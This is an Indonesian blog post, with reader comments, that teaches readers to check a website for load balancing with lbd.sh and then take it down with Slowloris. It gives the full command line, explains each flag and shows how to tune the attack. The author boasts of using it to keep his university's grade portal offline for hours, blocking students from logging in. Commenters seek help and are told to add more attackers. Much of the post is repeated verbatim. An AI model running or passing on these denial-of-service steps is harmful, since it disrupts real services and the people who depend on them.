Nah sekarang kita coba gunakan LBD dan Slowloris...
pertama saya sarankan jangan terlalu sering main beginian kasian karena merugikan..kemarin² saya kesal dengan kampus saya karena sudah ipk jelek pemberitahuan remedialpun ga jelas , di undur lah, nilai belum fix lah, udah tau saya mahasiswa goblok d bikin susah lagi..mana bayar 26rb/mata kuliah :'( ...jadi curhat wkwkwk...
oke, pertama gunakan lbd.sh untuk cek load balancing pada web caranya :
- Buka terminal ( ctrl + t )
- ketik cd Desktop ( tempat menyimpan kedua tools/file tadi )
- jalankan lbd.sh dengan perintah ./lbd.sh
- jika permision denied ketik dulu chmod 755 lbd.sh lalu coba lagi ketik ./lbd.sh
- jika berhasil langsung ketik ./lbd.sh example.com bisa juga dengan menggunakan ip web tsb caranya ping dulu
( ping www.example.com ) nanti ada ip yg muncul...
- tunggu hingga selesai dan lihat apakah menggunakan load balancing atau tidak jika tidak output akhir yg saya dapatkan seperti ini :
Checking for HTTP-Loadbalancing [Diff]: NOT FOUND
203.130.232.49 does NOT use Load-balancing.
berarti kita lanjutkan ke slowloris.... :)
- ketik pada terminal cd Desktop ( jika sudah langsung saja )
saya mencoba dengan timeout 500 dan num 700, berhasil web tidak bisa d buka , tapi tidak lama kemudian bisa lagi :(
dan sayapun memutuskan untuk iseng, timeout saya kasih 500 dan num 5000 wkwk hasilnya memuaskan,,
beberapa jam web tidak bisa d buka, (dengan catatan jika web sudah terbuka lagi saya ulangi lagi slowlorisnya)..otomatis yang mau login melihat nilai harus tertunda...itu hanya sebagai pengalaman saja :)
mungkin di postingan berikutnya saya akan share videonya karena mungkin kata2 saya ada yg tidak di mengerti atau berbelit2 mohon d maklumi...
jika ada kesalahan tolong d komentari agar bisa sy perbaiki ...
selamat mencoba :)
Thanks to : AHA
- jika permision denied ketik dulu chmod 755 lbd.sh lalu coba lagi ketik ./lbd.sh
- jika berhasil langsung ketik ./lbd.sh example.com bisa juga dengan menggunakan ip web tsb caranya ping dulu
( ping www.example.com ) nanti ada ip yg muncul...
- tunggu hingga selesai dan lihat apakah menggunakan load balancing atau tidak jika tidak output akhir yg saya dapatkan seperti ini :
Checking for HTTP-Loadbalancing [Diff]: NOT FOUND
203.130.232.49 does NOT use Load-balancing.
berarti kita lanjutkan ke slowloris.... :)
- ketik pada terminal cd Desktop ( jika sudah langsung saja )
- ./slowloris.pl -dns [target] -port 80 -timeout 500 -num 500 -tcpto 5 -httpready
*selama melakukan dos terminal jangan d close
- tapi jika ingin lebih mantap silahkan pahami kutipan yang saya dapat dari http://forum.indonesianbacktrack.or.id/keterangan :
* -dns : the target ( dapat berupa IP atau domain )
* -port : port yg di gunakan oleh webserver ( 80 )
* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test
* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi
* -tcpto : TCP Timeout.
* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.
* -dns : the target ( dapat berupa IP atau domain )
* -port : port yg di gunakan oleh webserver ( 80 )
* -timeout: nilai waktu delay timeout untuk setiap paket thread, penantian reacquiring ruang tcp di server. pada langkah pengetesan, Nilai ini diisi dengan flag -test
* -num : jumlah soket yang digunakan untuk mendapatkan koneksi.Biasanya server apache akan membutuhkan nilai antara 400-600 atau tergantung pada konfigurasi
* -tcpto : TCP Timeout.
* -httpready: HTTPReady di gunakan apache untuk buffer connections. attacker dapat melewati perlindungan ini dengan mengirimkan permintaan POST bukan GET atau HEAD.
untuk mengetahui limit timeoout gunakan perintah
./slowloris.pl -dns [ip/webdomain target] -port 80 -test
tunggu sampai mememukan limit timeoutnya
saya mencoba dengan timeout 500 dan num 700, berhasil web tidak bisa d buka , tapi tidak lama kemudian bisa lagi :(
dan sayapun memutuskan untuk iseng, timeout saya kasih 500 dan num 5000 wkwk hasilnya memuaskan,,
beberapa jam web tidak bisa d buka, (dengan catatan jika web sudah terbuka lagi saya ulangi lagi slowlorisnya)..otomatis yang mau login melihat nilai harus tertunda...itu hanya sebagai pengalaman saja :)
mungkin di postingan berikutnya saya akan share videonya karena mungkin kata2 saya ada yg tidak di mengerti atau berbelit2 mohon d maklumi...
jika ada kesalahan tolong d komentari agar bisa sy perbaiki ...
selamat mencoba :)
Thanks to : AHA
Langganan:
Posting Komentar (Atom)
10 komentar:
Haduhhh yg ini lebih ga' paham..
video nya dong biar lebih jelas..
terima kasih
hehehe maaf ya kl kata2nya bikin pusing...
nanti saya upload videonya... semangat :e:
bang, saya dah coba ikutin tutorial y , tpi knpa eah serangan dos y cman sebentar g lma pdhal num y dah saya ksih 8000, mhon penceran y , ,
terima kasih..
klo sempet jwban y di krm k email saya di arisncup@yahoo.com
setau saya kalo misalkan terminal di close proses DOSnya jg berhenti..jadi proses pengiriman paketnya berhenti..otomatis webnya kembali up lg..kalo masalah lama atau engganya tergantung web dan mungkin banyaknya yang DOS..
mungkin itu yang membedakan DOS dan DDOS..
tambah pasukan aja ;)
ky pingfloodny windows y om :D thanks 4 sharing
iya om fryme...menurut sy pada intinya sama membanjiri server dengan mengirim paket data,, makasih kunjungannya.. :D
bro, langkahnya semua udah dijalanin tapi pas slowloris dijalanin ternyata ada error SSL di line 4. Mohon pencerahan nya bro mungkin ada update dari slowloris.pl nya untuk SSL
kalo ke website dengan basis Wordpress bisa ga mas!
yang saya tau tergantung dari HOSTnya..mau apapun CMSnya, karena kita nyerang bandwith hostnya.. :)
@moonst0mper : slowloris itu masih bisa n maaf sya blm pernah menemukan error seperti itu :D
kereeen gan tutorial nya... masih DL BT dulu... masih lanjut pengen belajar, begadang siapin kopi rokok 2 slop :D....
Posting Komentar